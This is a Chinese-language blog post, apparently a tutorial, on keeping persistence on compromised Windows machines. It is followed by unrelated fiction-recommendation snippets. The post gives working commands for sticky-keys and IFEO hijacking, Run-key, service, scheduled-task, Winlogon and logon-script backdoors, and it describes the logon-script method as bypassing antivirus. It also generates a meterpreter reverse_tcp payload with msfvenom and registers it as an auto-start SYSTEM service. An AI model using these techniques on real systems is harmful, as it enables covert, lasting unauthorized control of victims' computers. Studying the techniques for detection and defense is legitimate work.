细!最新Windows后渗透之权限维持

Windows后渗透之权限维持

辅助功能劫持

Windows10 有一些辅助功能。这些功能可以在用户登录之前以组合键启动。根据这个特征,一些恶意软件无需登录到系统,通过远程桌面协议就可以执行恶意代码。

一些常见的辅助功能如:

    C:\Windows\System32\sethc.exe    粘滞键    快捷键:按五次 shift 键

    C:\Windows\System32\utilman.exe    设置中心  快捷键:Windows+U 键

    C:\Windows\System32\Magnify.exe    放大镜      快捷键:Windows+加减号

最常见的验证方法就是将cmd.exe的文件名换成上面的名字,然后使用对应的快捷键就可以调出cmd窗口了。

可能会遇到的问题:

我在实现这个操作的时候会遇到需要TrustedInstaller权限的情况,解决方法就是打开这个文件的属性,然后在安全栏目里点击高级,然后再点击更改,再点击一次高级,进入之后点击立即查找,双击你有权限操作的用户就可以了。

镜像劫持

所谓的镜像劫持,就是在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Image File Execution Options]处新建一个以杀毒软件主程序命名的项(也可以是自启动程序命名的项),例如Rav.exe。然后再创建一个子键“Debugger="C:\1.bat”(里面可以写命令,这里也可以是一些可执行程序的路径)。当我们双击打开那个程序时,就会运行Debugger路径的程序。

原理

当我们双击运行程序时,系统会查询该IFEO注册表,如果发现存在和该程序名称完全相同的子键,就查询对应子健中包含的“dubugger”键值名,如果该参数不为空,系统则会把 Debugger 参数里指定的程序文件名作为用户试图启动的程序执行请求来处理。这样成功执行的是遭到“劫持”的虚假程序。

实验

首先新建一个bat文件,内容是calc

以管理员权限打开CMD,键入命令reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.EXE" /v debugger /t REG_SZ /d "C:\Users\123.bat"

双击运行QQ,会出现一个CMD的窗口一闪而过,这是bat文件在运行,然后调用计算器。

启动目录

将可执行文件放入启动目录下,开机会自动运行。

启动文件夹路径:

C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

隐藏文件

attrib +h +s xxx.exe

相关键值

Startup键值指向启动文件夹

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

启动时注册表后门

启动项键值路径

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

首先在123.bat文件中敲入calc,然后将路径添加到注册表键值中

注销后重新登录,成功打开计算器

最后附赠命令行方式快速添加

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  /v "Keyname" /t REG_SZ /d "C:\123.bat" /f

启动时服务后门

Windows的服务程序通常默默的运行在后台,且拥有 SYSTEM 权限,非常适合用于后门持久化。我们可以将EXE/DLL等可执行文件注册为服务实现后门持久化。

首先在KALI生成后门,再将后门上传到被控主机上

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=5555 -f exe >/tmp/pentestlab.exe

打开被控制的主机输入

sc create pentestlab binpath= "cmd /k C:\users\test\pentestlab.exe" start= "auto" obj= "LocalSystem"

sc start pentest

powershell创建服务

New-Service -Name "pentestlab" -BinaryPathName "C:\users\test\pentestlab.exe" -Description "PentestLaboratories" -StartupType Automatic

sc start pentestlab

系统计划任务后门

Windows实现定时任务主要有schtasks与at二种方式,通过计划任务

At 适用于windows xp/2003,Schtasks适用于win7/2008+

用管理员权限打开命令行:schtasks /create /sc onlogon /tn calc /tr c:\123.bat

注销重新登录

Winlogon用户登录初始化

Winlogon.exe 进程是 Windows 操作系统中非常重要的一部分,Winlogon 用于执行与 Windows 登录过程相关的各种关键任务。

在注册表路径HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的Userinit项指向userinit.exe,是用户登录时执行的用户初始化程序。

可以在后面加上可执行程序的绝对路径,在用户登录时将被执行。

还有一个命令行方式添加的,只能用powershell才可以添加,cmd添加后reg query是变了,但是注册表界面里的值却没有改变,也不会生效,有大佬知道的麻烦教教我。

Set-ItemProperty  "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name  Userinit -value "C:\Windows\system32\userinit.exe,C:\123.bat"

Logon Scripts后门

在注册表路径为HKEY_CURRENT_USER\Environment\下创建一个字符串键值UserInitMprLogonScript。

这里面的值是Windows登录脚本,当用户登录时触发,Logon Scripts能够优先于杀毒软件执行,绕过杀毒软件对敏感操作的拦截。

命令行方式:reg add "HKCU\Environment" /v "UserInitMprLogonScript" /t REG_SZ /d "c:\script\123.bat"

远程登录实现多人登录一个账号

环境:Windows server 2012

打开cmd,输入gpedit.msc 组策略,找到【计算机设置】--【管理模板】--【windows组件】--【远程桌面服务】--【远程桌面会话主机】--【连接】

按照以下步骤操作:

1、拒绝将已经登录到控制台会话的管理员注销---选择启用

2、限制连接的数量---选择启用,配置‘允许的RD最大连接数’为10个

3、将远程桌面服务用户限制到单独的远程桌面服务会话---选择禁用

gpupdate /force 命令到管理员命令提示符窗口中

远程登录结果

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 159,716评论 4 364
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,558评论 1 294
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 109,431评论 0 244
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 44,127评论 0 209
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,511评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,692评论 1 222
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,915评论 2 313
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,664评论 0 202
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,412评论 1 246
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,616评论 2 245
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,105评论 1 260
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,424评论 2 254
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,098评论 3 238
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,096评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,869评论 0 197
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,748评论 2 276
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,641评论 2 271

推荐阅读更多精彩内容